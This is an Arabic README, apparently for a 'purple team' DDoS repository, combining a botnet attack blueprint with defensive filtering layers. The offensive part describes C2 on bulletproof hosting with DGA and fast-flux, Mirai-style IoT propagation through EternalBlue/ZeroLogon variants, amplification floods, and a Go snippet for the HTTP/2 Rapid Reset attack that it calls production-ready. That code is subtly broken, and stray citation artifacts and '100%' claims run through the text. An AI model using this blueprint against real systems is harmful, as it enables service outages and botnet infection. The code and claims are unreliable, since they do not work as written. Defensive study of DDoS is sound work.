
قابلة للتكرار كمخطط متقدم لفرق الأرجواني في هجمات الحرمان الموزع للخدمة (DDoS)، مصممة لتناسب مشهد التهديدات. تدمج مجموعة هجومية من فرق النخبة الحمراء—تتضمن تدوير متعدد النواقل، استغلال إعادة الضبط السريع لـ HTTP/2 (CVE-2023-44487)، وتنسيق القيادة والتحكم المشفر بـ mTLS 1.3—مع بنية دفاع عالية التكامل من 7 مستويات لفرق النخبة الزرقاء.
= doi.org/10.5281/zenodo.18287026
= orcid.org/0009-0007-7728-256X
هذا المستودع ووثائقه مخصصة حصريًا للأغراض التعليمية والدفاعية وأبحاث الأمن الهجومي المصرح بها ضمن بيئات معملية معزولة (مثل REMnux, VMware, VirtualBox). التنفيذ في العالم الحقيقي غير قانوني بشدة ويترتب عليه عقوبات شديدة:
إندونيسيا: المواد 27-46 من قانون UU ITE (السجن من 6 إلى 12 سنة + غرامات تصل إلى 12 مليار روبية إندونيسية).
دوليًا: قانون المرونة السيبرانية للاتحاد الأوروبي 2025، قانون الاحتيال وإساءة استخدام الحاسوب الأمريكي (CFAA) (غرامات 250 ألف دولار+ وسجن 10+ سنوات)، واتفاقية بودابست لمكافحة الجريمة السيبرانية.
قيود الاستخدام: يجب استخدامه فقط في netns معزولة، بدون عنوان IP عام، وبموافقة 100% من الهدف.
يوفر هذا الإطار تحليلاً شاملاً متعدد النواقل لنماذج هجمات حجب الخدمة الموزعة (DDoS) الحديثة المتوقعة للفترة 2025-2026. يدمج بين تنسيق شبكات الروبوتات للفريق الأحمر (الهجومي) واستراتيجيات الدفاع ذات السبع طبقات للفريق الأزرق (الدفاعي) في نظام بيئي واحد محدد للفريق الأرجواني.
هجمات هجينة متعددة النواقل: تنسيق هجمات من الطبقة 3 إلى الطبقة 7، بما في ذلك إعادة الضبط السريع لـ HTTP/2 (CVE-2023-44487).
تضخيم شديد: دمج عامل تضخيم 500x عبر Memcached و 50x عبر عاكسات DNS.
بنية تحتية مرنة: خادم أوامر وتحكم مضاد للرصاص مع خوارزمية توليد النطاقات (DGA) وتشفير TLS 1.3 وتدوير النطاقات سريع التدفق (Fast-Flux).
دفاع بمستوى مؤسسي: تنفيذ تصفية تجاوز النواة eBPF/XDP، وتحليل سلوكي قائم على التعلم الآلي، والتنسيق والأتمتة والاستجابة الأمنية (SOAR).
المكون الهجومي مصمم لإشباع 120% من سعة الهدف خلال 60 ثانية والحفاظ على العمليات لمدة تصل إلى 168 ساعة.
بنية تحتية لخادم الأوامر والتحكم: خوادم VPS مضادة للرصاص (مضيفو RU/UA/BR) مع وحدات Nginx Lua و Redis لإدارة الحالة.
تنفيذ خوارزمية توليد النطاقات: توليد نطاقات يوميًا باستخدام بذور محددة لضمان مرونة القيادة والتحكم.
الانتشار: مسح آلي عبر masscan (استهداف المنافذ 23, 80, 443, 554) واستغلال ثغرات إنترنت الأشياء (متغيرات EternalBlue/ZeroLogon).
الاتصال: تشفير mTLS 1.3 + إخفاء حمولة XOR عبر WebSocket (wss://).
package main
import "golang.org/x/net/http2"
// Production-ready CVE-2023-44487 variant for 2026 lab research
func rapidReset(target string) {
c, _ := http2.Transport{}.NewClientConn(rawConn)
for i := 0; i < 100; i++ {
stream, _ := c.OpenStream()
stream.WriteHeaders(mkHeaders(), http2.EndStream|http2.EndHeaders)
stream.SendRstStream(http2.ErrCodeCancel) // Immediate stream cancellation to exhaust server
}
}
تم تنظيم الدفاع كنموذج أمان متعدد الطبقات من 7 مستويات للتخفيف من التهديدات الحجمية والبروتوكولية وطبقة التطبيق.
المستوى 0 (المنبع): توجيه BGP الفارغ والتنظيف السحابي (Cloudflare Magic Transit) لامتصاص أكثر من 10 تيرابايت/ثانية.
المستوى 1 (الحافة): nftables مع حظر GeoIP و ASN لإسقاط نطاقات شبكات الروبوتات المعروفة.
المستوى 2 (الأجهزة/النواة): eBPF/XDP (مسار البيانات السريع) للتصفية على مستوى النواة بمعدل خط يزيد عن 100 مليون حزمة/ثانية.
المستوى 4 (جدار حماية تطبيقات الويب/التعلم الآلي): Nginx + ModSecurity باستخدام غابة العزلة (Scikit-learn) للكشف عن الشذوذ السلوكي.
المستوى 7 (التنسيق والأتمتة والاستجابة الأمنية): وظائف خطوات AWS 'آلة الحالة' للعمليات 'الهجومية المضادة' الآلية، مثل تحديثات NACL في أقل من 30 ثانية.
SEC("xdp")
int ddos_filter(struct xdp_md *ctx) {
[cite_start]// High-performance kernel-bypass filtering [cite: 142]
void *data_end = (void *)(long)ctx->data_end;
void *data = (void *)(long)ctx->data;
struct ethhdr *eth = data;
if (data + sizeof(*eth) > data_end) return XDP_PASS;
struct iphdr *ip = data + sizeof(*eth);
// Block UDP floods >1400B (volumetric fragment evasion)
if (ip->protocol == IPPROTO_UDP && ntohs(ip->tot_len) > 1400) {
return XDP_DROP;
}
return XDP_PASS;
}
لتحقيق إعادة إنتاج محددة ودقيقة 100%، اتبع هذه الإجراءات بالضبط.
متطلبات الأجهزة: Intel i7-12700+، 64 جيجابايت DDR4، بطاقة شبكة 10 جيجابت/ثانية (Intel X550-T2).
تأمين المضيف: تعطيل إعادة توجيه IP وتمكين إسقاطات iptables الصارمة على جهاز المضيف.
المشرف الافتراضي: تثبيت VMware Workstation Pro 17.6+ وتكوين شبكات 'مضيف فقط' مخصصة (VMnet8) و 'NAT داخلي' (VMnet9).
نشر REMnux: استيراد OVA REMnux v7.3.0 لتحليل البرامج الضارة وحركة المرور المتقدم.
sudo ip netns add ddos_attacker
sudo ip netns add ddos_target
sudo ip netns add ddos_scrubber
# Configure veth pairs to simulate isolated network pipes
أدوات المحاكاة: تثبيت hping3, masscan, zmap, scapy, و slowhttptest.
بيئة الهدف: Ubuntu Server 24.04 مع Nginx/Apache2 و stress-ng لمحاكاة حمل خادم ثقيل.
خدمات وهمية: استخدام INetSim لتوفير خدمات DNS/NTP وهمية لاختبار الانعكاس الداخلي في المختبر.
للتحقق الناجح من الجاهزية للإنتاج بنسبة 100%، يجب أن يفي النظام بمؤشرات الأداء الرئيسية المحددة التالية:
متوسط وقت الكشف (MTTD): < دقيقة واحدة عبر إشارة التعلم الآلي.
متوسط وقت الاستجابة (MTTR): < 30 ثانية لحظر NACL المدفوع بالتنسيق والأتمتة والاستجابة الأمنية.
توفر النظام (SLA): الحفاظ على نجاح 100% للطلبات القانونية أثناء محاكاة نشطة بمقياس 20 تيرابايت/ثانية.
معدل تجنب التكلفة: نسبة الطلبات الضارة المحظورة إلى تكاليف AWS Lambda/عرض النطاق المحتملة.
/DDoS_Purple_Elite_Teaming_2026/
├── /offensive/
[cite_start]│ ├── mirai_fork_2025/ # IoT Botnet research [cite: 495]
[cite_start]│ ├── http2_rapid_reset.go # Layer 7 exploit [cite: 542]
[cite_start]│ └── c2_orchestrator.py # DGA & Multi-vector control [cite: 557]
├── /defensive/
[cite_start]│ ├── ddos_xdp.c # eBPF Kernel filter [cite: 142]
[cite_start]│ ├── terraform_waf_v2/ # AWS WAF & NACL infra [cite: 294]
[cite_start]│ └── ml_anomaly_detector.py # Scikit-learn isolation forest [cite: 336]
├── /lab_setup/
[cite_start]│ ├── isolate_network.sh # VM isolation scripts [cite: 618]
[cite_start]│ └── deploy_all.sh # Automated deployment [cite: 133]
[cite_start]└── README.md # This file [cite: 378]
توفر هذه الوثائق كومة تقنية كاملة وغير مقيدة لفرق الأرجواني لـ DDoS. باتباع تكتيكات الدفاع "الأرض المحروقة" والاستراتيجيات الهجومية "تناوب النواقل المتعددة"، يمكن لباحث الأمن تحقيق بيئة محاكاة دقيقة بنسبة 100%.
الحالة: جاهز للإنتاج 100% التاريخ: 18 يناير 2026 التوقيع: SASTRA_ADI_WIGUNA
| الناقل | الطبقة | المقياس المستهدف | معايير الدقة | النطاق/التضخيم 2025 |
|---|
| فيضان UDP + تضخيم | L3/4 | عرض النطاق | 1 مليون حزمة/ث، شظايا 8 بايت، مصدر مزور | عامل 200-500x |
| فيضان SYN | L4 | تتبع الاتصال | 500 ألف نصف مفتوح/ثانية | 10 مليون حزمة/ث إجمالي |
| إعادة الضبط السريع HTTP/2 | L7 | وحدة المعالجة المركزية/الذاكرة | 100 تيار/دفعة، إعادة تعيين فوري | 100x مقارنة بـ HTTP/1.1 |
| Slowloris/RUDY | L7 | خيوط التطبيق | 1 بايت كل 10 ثواني تقطير | استنزاف الموارد |